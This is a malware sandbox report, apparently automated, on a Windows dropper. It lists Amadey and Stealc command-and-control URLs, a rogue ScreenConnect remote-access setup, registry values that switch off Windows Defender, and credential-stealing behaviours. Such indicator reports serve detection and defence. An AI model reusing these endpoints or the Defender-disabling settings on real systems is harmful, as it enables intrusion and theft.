Analysis
-
max time kernel
144s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-12-2024 15:11
Static task
static1
Behavioral task
behavioral1
Sample
0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe
Resource
win10v2004-20241007-en
General
-
Target
0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe
-
Size
6.9MB
-
MD5
1f5c25503402f436f0d752b9e3b86fdd
-
SHA1
ba1469c11b2d6f5db52c4e362d31f076d37af680
-
SHA256
0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c
-
SHA512
b423e999fe3276b9820331c261a6fc7bf099d619f3f990eeb3f6859e86370f4202cf743a0d9063ef827a14ccb3e4cc72ac0baf96fb54d8e5262ebd897865e330
-
SSDEEP
196608:xgQSdVr3RyxoLCWj5sn5SElnBthIxQhAGQbahypEFlLzo:xRMrhyyun5bnBthINGQWg2f
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral1/files/0x000c000000023bfb-140.dat family_vidar_v7 behavioral1/memory/4980-144-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 behavioral1/memory/4980-315-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 -
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" JQY6PX392UESHKN5CCVSO6ZYV061P.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" JQY6PX392UESHKN5CCVSO6ZYV061P.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" JQY6PX392UESHKN5CCVSO6ZYV061P.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" JQY6PX392UESHKN5CCVSO6ZYV061P.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 4Z894j.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 4Z894j.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" JQY6PX392UESHKN5CCVSO6ZYV061P.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 4Z894j.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4Z894j.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 4Z894j.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection JQY6PX392UESHKN5CCVSO6ZYV061P.exe -
Stealc family
-
Vidar family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 1a713a333e.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1a50E5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4Z894j.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1a713a333e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2b2046.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ JQY6PX392UESHKN5CCVSO6ZYV061P.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3K21A.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 36599ddf00.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2880 powershell.exe 376 powershell.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (98a59bd0eed9222b)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=gips620.top&p=8880&s=f31bb2f9-de3c-4da2-bc83-b8e281547b2d&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAbIpSpj7TWkCJ0IL7CCDWtAAAAAACAAAAAAAQZgAAAAEAACAAAABvzX60sbULbdZHzwh3cVwRWyWZDQ4zm6p%2bLBT6%2f%2f%2b8eAAAAAAOgAAAAAIAACAAAAAGeFurI8IIbajOnamd6DIp7hH0AePSV5NmzdKaw4xsqKAEAABlLk8HheXNfcrc%2fEX1X8DdLTm4j6QmMctku0nqQ%2blMdT9dazpTU74eP3Fl%2fXrQCsrgentTNT%2b%2bH63m4mCuV9q%2b1ThplyRQ2zdTCNO%2fOCSRaUK9HwJPT5BH5YOuPnqUuOtCe22DMgesvIH6%2bCIlQg81HIMET%2btrhqX%2bopOfMra9QooVVx%2bV1ZDx%2bJvMJCugUPE%2fPElu9KT4L1zb%2fFDppfovvSpZYCDOlXys5AAzYEb3DpAZtqmf%2bshgKX52u%2fh2XXcK7CL9LUw2yqvtKeM4p3fIWdSEmoXwvAoxDxw2Ol2szC%2fo1z4rdgm5yqNuFPPF7Nu07EEpxoG2OnT9VzzZ6cTDVn8yHEvGL4zXwYdoOmSF7Pm%2bDpu%2bMPKAWCnLNp9%2bvr%2f8HvArAAR92J1Y8Riv%2b5uTQwtjiRO0J%2fw3xJ1BBq7TqaEAZ2sGAW8khQviZHGkxVLXKx%2f8gT6rD4YrExa3o%2bzj7SC04o5MQy9szJpxIPT%2bxqK5nBJwQiP49JiwGzAM7Bpko6nFV95CvzxpWdfzBBoLnjBddu7WRKbaQqOwIWKl05gbcNNXTDYyjQX1wdqU77JYMe2y%2fweZ%2bMh0gWMD4WZgQxkY9IQaW9FtGbzvukKZRBWI4r5KQMBnAdEgKFOCo9EpSSZwczkQDTWxeKfkYvREEi7ZFOpHdKW4BWFbEpR6o0v6VsA4YTlIaCXZNxx4yb4uFdM4Qr7lWfOibEXNrF5NV67TOggC56QsCjHBzROGhgozO9yJH9a6TCfdlG%2f51L4jaQS%2bpJuVCxYzF6Pve0Wcwdgw6IZxRxbkIsPxgxyb648ifjxO1zqNTZK1RdHtn99%2fJPHCkkfMp9HwYQ4LwIxkw0P%2b%2bkjBiJ4%2f0uODbfJ5uNeeCAT6UP4OefInFay1kA%2fYPrRo0nkuhk58ThpGf2uotabwuuIlsdKuay%2fpox%2bbNB1RkFT4rwI9sdzY2sVI5DZ%2bISq36luGwP%2b%2bVUM1bvWuh9eRT6jixpY2iu%2floWnWfihejftNd7c%2fy0a8hSTZpz096MfQ6bGpE%2felXNEiEEISFbouBseQlNXRnEOd3vcSrdzVCkI273CE8g7CBoI%2f3%2f0odtG9BYZEJB7Q%2bjkI3N7BbYupuKito%2bKLszJEX4LEe%2f8t3poEYwrDARkDV8DDb6%2f0p33KPzS7bJtLdGE6yscyLxN9nlHDPmotc6adlLzVG2gBV%2fjlo%2bCkTtSJypdfPiRXS1EE9GJL3M4eP4dmDcHdDOZo0X6tIhuJyv4gO336jRUphWBcCL7j3ND2jtS9BdgsspQFhR%2bRNtgBEBA1vzdynrNloxD0Up3j39Tpo%2fT2s6%2brIxyJWwPWq9oP2kmrgTRMRkqjGx1coJLgdD1Wt2jUi8LOIwq0xW8Uu6mXwoVgLHsvRc8Otl%2bQFT0rYJYQT7sEwYQPr%2faac2G2AkSWM0Qn32X6JzJGCfIEPpk4vdtRe1734O8%2byV7hRSKFHE1tTxy0fLgkfA6vXNfGjKeI4dWBUWRnHZjEIHo8D1qYEbatShGtyDfqLl2PLymdPuuCw5DDfss3h6tRMbeGwZ5V6cjJdgSAsX3MI1AioFjxwecIl0AAAADeZYOJecn%2bmn7HcD5dthuiC2Q%2bBHubDW1MfGyQTY97jDgU%2bfLNzaQkgjDwNPFsA4OYZIbLEul7Y1inF6%2fyrN%2bH&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3K21A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4Z894j.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 36599ddf00.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1a50E5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 36599ddf00.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3K21A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4Z894j.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion JQY6PX392UESHKN5CCVSO6ZYV061P.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1a713a333e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1a713a333e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2b2046.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2b2046.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1a50E5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion JQY6PX392UESHKN5CCVSO6ZYV061P.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation NN9Dd7c.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 746f41769d294a238d0d787c1fb39ef6.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 3302d26666d341748cb9b86600ad2546.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation ga70pjP.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 1a50E5.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation skotes.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 23 IoCs
pid Process 2208 u5u31.exe 2744 M2G14.exe 4640 1a50E5.exe 1804 skotes.exe 5100 2b2046.exe 5068 skotes.exe 1876 NN9Dd7c.exe 4980 3302d26666d341748cb9b86600ad2546.exe 1720 746f41769d294a238d0d787c1fb39ef6.exe 216 b61f5c2478.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 4624 b61f5c2478.exe 3716 skotes.exe 6488 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe 6348 3K21A.exe 4960 4Z894j.exe 5876 ga70pjP.exe 4080 ScreenConnect.ClientService.exe 6564 ScreenConnect.WindowsClient.exe 6992 ScreenConnect.WindowsClient.exe 5328 36599ddf00.exe 2184 skotes.exe 5152 1a713a333e.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 1a50E5.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 2b2046.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 3K21A.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 1a713a333e.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine JQY6PX392UESHKN5CCVSO6ZYV061P.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 4Z894j.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 36599ddf00.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe -
Loads dropped DLL 22 IoCs
pid Process 5720 MsiExec.exe 5256 rundll32.exe 5256 rundll32.exe 5256 rundll32.exe 5256 rundll32.exe 5256 rundll32.exe 5256 rundll32.exe 5256 rundll32.exe 5256 rundll32.exe 5256 rundll32.exe 5516 MsiExec.exe 5368 MsiExec.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features JQY6PX392UESHKN5CCVSO6ZYV061P.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" JQY6PX392UESHKN5CCVSO6ZYV061P.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4Z894j.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" u5u31.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" M2G14.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 50 raw.githubusercontent.com 51 raw.githubusercontent.com 52 raw.githubusercontent.com -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390038006100350039006200640030006500650064003900320032003200620029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\0hixpbwt.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\0hixpbwt.newcfg ScreenConnect.ClientService.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 4640 1a50E5.exe 1804 skotes.exe 5100 2b2046.exe 5068 skotes.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 3716 skotes.exe 6488 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe 6348 3K21A.exe 4960 4Z894j.exe 5328 36599ddf00.exe 2184 skotes.exe 5152 1a713a333e.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 216 set thread context of 4624 216 b61f5c2478.exe 122 -
Drops file in Program Files directory 19 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\system.config msiexec.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI8E0.tmp msiexec.exe File created C:\Windows\Installer\e590807.msi msiexec.exe File created C:\Windows\Tasks\skotes.job 1a50E5.exe File created C:\Windows\Installer\e590805.msi msiexec.exe File opened for modification C:\Windows\Installer\e590805.msi msiexec.exe File created C:\Windows\Installer\SourceHash{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD} msiexec.exe File created C:\Windows\Installer\wix{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI900.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA97.tmp msiexec.exe File created C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 6620 5328 WerFault.exe 143 5468 5328 WerFault.exe 143 -
System Location Discovery: System Language Discovery 1 TTPs 27 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2b2046.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NN9Dd7c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1a713a333e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language u5u31.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36599ddf00.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language M2G14.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1a50E5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3302d26666d341748cb9b86600ad2546.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3K21A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JQY6PX392UESHKN5CCVSO6ZYV061P.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b61f5c2478.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ga70pjP.exe Key opened 